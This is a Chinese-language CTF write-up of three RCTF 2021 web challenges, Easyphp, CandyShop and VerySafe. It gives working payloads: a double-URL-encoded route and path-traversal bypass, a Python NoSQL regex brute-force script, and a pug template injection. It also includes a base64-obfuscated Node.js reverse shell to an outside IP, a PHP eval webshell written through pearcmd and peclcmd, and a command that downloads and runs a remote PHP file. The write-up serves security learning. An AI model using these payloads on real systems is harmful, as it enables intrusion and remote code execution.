0%

RCTF 2021

太难了,复现不来🙃

Easyphp

Just a common and simple php service
http://124.71.132.232:60080

题目附件: 点击下载附件 1

本题是一个Flight框架,官方地址:https://github.com/mikecao/flight

Flight is a fast,simple,extensible framework for PHP Flight enables you to quickly and easily build RESTful web applications

先看到index.php

image-20210918222045955

我们跟进发现有个file_get_contents可以任意文件读取

image-20210918224014766

直接访问/admin显示Forbidden

image-20210915164720984

原因是nginx这里限制/admin只能本地访问

image-20210915092207995

这里看到Router.php会对传进来的参数进行一次urldecode

image-20210915091846419

所以这里我们可以利用/ad%256din绕过,因为路由是按顺序执行的

image-20210915202343936

这里我们需要绕过stristr($request->url,"login")

可以用/ad%256din%253flogin绕过

image-20210915202800480

并且有个isdanger函数把../过滤了

我们可以看到data是从/admin路由的"./".$request->query->data传进去的,这里直接双url编码绕

payload

1
/ad%256din%253flogin%3fdata=..%252f..%252f..%252fflag

Nu1L队解法

1
/login/..;/admin%3flogin=aa&data=..%252f..%252f..%252fflag

CandyShop

Buy some sweet candies online?
环境每10分钟重启一次/The container will be restarted every 10 minutes
http://123.60.21.23:23333

题目附件: 点击下载附件 1

看源码这里发现新注册的账号没有激活

image-20210918233201255

但是这里有个rabbit账号是激活的,但是没有密码

image-20210918233315569

首先这里存在nosql注入

image-20210915210658773

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# -*- coding: utf-8 -*-
"""
Create Time: 2021/9/11 12:58
Author: JrXnm
"""
import requests
import string
url = "http://123.60.21.23:23333/user/login"

flag = ''
while True:
for i in string.hexdigits:

data = {
"username": "rabbit",
"password[$regex]": "^" + flag + i
}
res = requests.post(url, data=data)

if("You Bad Bad" in res.text):
flag += i
print(flag)
break

这里看到shop处可以渲染pug模板

image-20210915220807460

看到这里在模板渲染前的文本替换

1
2
3
4
5
let tpl = result
.toString()
.replace('USERNAME', username)
.replace('CANDYNAME', candyname)
.replace('ADDRESS', address)

image-20210918235926239

这里我们可以用引号和等于号闭合一下前后即可

payload

1
2
username=1&candyname=1&address='+a=global.process.mainModule.constructor._load('child_process').
execSync("cat+/flag").toString()+b='

或者反弹shell

1
username=rabbit&candyname=bunny_candy&address='+a=function(){eval(atob("dmFyIG5ldD1wcm9jZXNzLm1haW5Nb2R1bGUucmVxdWlyZSgibmV0Iik7CnZhciBjcD1wcm9jZXNzLm1haW5Nb2R1bGUucmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpOwp2YXIgc2g9Y3Auc3Bhd24oIi9iaW4vc2giLFtdKTsKdmFyIGNsaWVudD1uZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMjM0LCIxMzQuMTc1LjE2OC4yMTMiLCgpPT57Y2xpZW50LnBpcGUoc2guc3RkaW4pO3NoLnN0ZG91dC5waXBlKGNsaWVudCk7c2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs="));}()+b='

VerySafe

I think it’s very safe
http://123.60.21.23:54120

题目附件: 点击下载附件 1

首先题目的docker-compose.yml给了image: caddy:2.4.2,在Caddy <= 2.4.2 在传递script_pathphp-fpm的时候可以目录穿越,同时register_argc_argv 是默认开启的,而且也默认包含peclcmd.php,因为security.limit_extensions的限制,只允许后缀为.php的文件执行

官方解法

1
2
3
4
GET /../usr/local/lib/php/peclcmd.php?+config-create+/tmp/<?=eval($_POST[1]);?>/*+/srv/qqqq.php

POST /../tmp/qqqq.php
1=system('/readflag');

星盟队解法

下载下来然后执行shell即可

1
2
3
/../usr/local/lib/php/pearcmd.php?pearcmd.php+install+--installroot+/tmp/+http://134.175.168.213/1.php

/../tmp/tmp/pear/download/1.php?1=system('/readflag');